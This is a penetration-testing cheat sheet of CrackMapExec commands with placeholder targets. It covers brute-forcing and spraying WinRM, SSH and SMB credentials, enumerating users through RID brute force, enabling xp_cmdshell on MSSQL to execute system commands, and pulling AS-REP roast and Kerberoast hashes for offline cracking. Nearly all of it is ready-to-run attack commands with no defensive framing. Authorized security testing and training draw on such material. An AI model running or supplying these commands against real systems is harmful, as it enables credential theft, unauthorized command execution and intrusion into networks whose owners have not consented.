cme.cheat

% crackmapexec, winrm

# winrm (no bruteforce: test 1<=>1)
cme winrm <target> -u <userlist> -p <pwdlist> --continue-on-success --no-bruteforce

# winrm (bruteforce)
cme winrm <target> -u <userlist> -p <pwdlist> --continue-on-success

% crackmapexec, ssh

# ssh (brutefoce)
cme ssh <target> -u <userlist> -p <pwdlist> --continue-on-success

# ssh (no bruteforce: test 1<=>1)
cme ssh <target> -u <userlist> -p <pwdlist> --continue-on-success --no-bruteforce

% crackmapexec, smb

# general info
cme smb <ip>

# list shares
cme smb <ip> --shares

# enumerate user
cme smb <target> -u '<user>' -p '<pass>' --rid-brute

# enumerate user as guest
cme smb <target> -u 'guest' -p '' --rid-brute

# bruteforce local user
cme smb <ip> --local-auth -u <user> -p <pwdlst>

% mssql

# Enable the xp_cmdshell on the target MSSQL
cme mssql <target> --local-auth -u <user> -p <pass> -q 'EXEC sp_configure "show advanced options", 1;RECONFIGURE;exec SP_CONFIGURE "xp_cmdshell", 1;RECONFIGURE'
cme mssql <target> --local-auth -u <user> -p <pass> -q 'EXEC xp_cmdshell "whoami"'

% ldap

# Test ldap connection
cme ldap -u <user> -p <password> -d <domain> --kdcHost <ip> <ip>

#  Get objets that had the value adminCount=1
cme ldap -u <user> -p <password> -d <domain> --kdcHost <ip> --admin-count <ip>

# Get the list of users and computers with flag TRUSTED_FOR_DELEGATION
cme ldap -u <user> -p <password> -d <domain> --kdcHost <ip> --trusted-for-delegation <ip>

# Get AS_REP response ready to crack with hashcat
cme ldap -u <user> -p <password> -d <domain> --kdcHost <ip> --asreproast asreproast.output <ip>

# Get TGS ticket ready to crack with hashcat (watchout for clock skew)
cme ldap -u <user> -p <password> -d <domain> --kdcHost <ip> --kerberoasting kerberoasting.output <ip>